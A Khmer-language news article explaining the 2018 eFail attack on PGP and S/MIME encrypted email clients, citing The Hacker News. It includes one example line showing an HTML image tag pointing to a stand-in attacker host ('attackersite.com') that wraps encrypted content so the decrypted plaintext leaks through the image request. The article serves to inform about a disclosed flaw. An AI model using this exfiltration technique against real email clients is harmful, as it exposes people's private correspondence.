នេះគឺជារបៀបដែលការវាយប្រហារ​ eFail Attack ដំណើរការនៅលើ PGP និង S/MIME Encrypted Emails

0

ថ្មីៗនេះ ក្រុមហ៊ុនសុវតិ្ថភាពទើបតែបញ្ចេញនូវព័ត៌មានលម្អិតនៃចំណុចរងគ្រោះដែលរកឃើញនៅក្នុង email clients ដែលប្រើប្រាស់នូវស្តង់ដារ email encryption standards—PGP និង S/MIME— បន្ទាប់ពីមានអ្នកណាម្នាក់ដែលទម្លាយនូវក្រដាសនេះនៅលើប្រព័ន្ធអ៊ីនធើណិតនោះ។ PGP និង S/MIME គឺជាស្តង់ដារ end-to-end encryption standards ដែលប្រើប្រាស់សម្រាប់ធ្វើការ encrypt emails នៅក្នុងវិធីដែលគ្មានអ្នកអ្នកណាម្នាក់សូម្បីតែក្រុមហ៊ុន រដ្ឋាភិបាល ឬឧក្រិដ្ឋជនអ៊ីនធើរណិតអាចធ្វើចារកម្មទៅលើទំនាក់ទំនងបាន។

បន្ទាប់ពីការពន្យល់អំពីរបៀបនៃចំណុចរងគ្រោះដែលដំណើរការនេះ វាមានការសម្គាល់ថាចំណុចរងគ្រោះនេះមិនស្ថិតនៅក្នុងស្តង់ដារនៃ email encryption standards នោះទេ។ វាមានឈ្មោះហៅថា eFail ហើយវាអនុញ្ញាតឱ្យអ្នកវាយប្រហារធ្វើការ decrypt ទៅលើ Content នៃ end-to-end encrypted emails នៅក្នុង Plaintext ថែមទៀត។ តាមការបញ្ជាក់នៅក្នុងក្រដាសនេះដែលទម្លាយដោយក្រុមអ្នកស្រាវជ្រាវសុវត្ថិភាពនៅក្នុងទ្វីបអ៊ឺរ៉ុបបញ្ជាក់ថា ចំណុចរងគ្រោះនេះស្ថិតនៅក្នុង encrypted email clients គ្រប់គ្រងទៅលើ HTML emails និងប្រភពខាងក្រៅ external resources ដូចជារូបភាព ស្ទាយ៍ចេញពី URLs ខាងក្រៅផងដែរ។

នេះគឺជារបៀបដែល eFail Attack ដំណើរការ៖

Email clients ត្រូវធ្វើការ configured ដោយស្វ័យប្រវត្តិទៅលើ Content នៃ encrypted emails ដែលអ្នកទទួលបាន ហើយអ្នកវាយប្រហារអាចលួចនូវ Messages ទាំងនេះជា Plaintext ។ នៅក្នុងការវាយប្រហារ eFail attack នេះ អ្នកវាយប្រហារអាចចូលទៅកាន់ encrypted emails បន្ទាប់មកធ្វើការវាយប្រហារដោយគ្មានជូនដំណឹងទៅអ្នកនោះទេ។ អ្នកវាយប្រហារអាចបន្ថែមនូវ image tag ដូចជា <img src=”https://attackersite.com/ នៅពីមុខ encrypted content និងបិទវិញដោយ .jpg”> ។

ចាប់តាំងពី email client នឹងដំណើរការនូវរូបភាព Image ចេញពី attacker-controlled server នោះអ្នកវាយប្រហារអាចធ្វើការចាប់យកនូវសំណើរដែលជាកន្លែង filename ប្រើប្រាស់នូវ content ពេញលេញសម្រាប់ encrypted email ជា Plaintext ផងដែរ៕

ប្រភព៖

https://thehackernews.com/2018/05/efail-pgp-email-encryption.html

 

LEAVE A REPLY

Please enter your comment!
Please enter your name here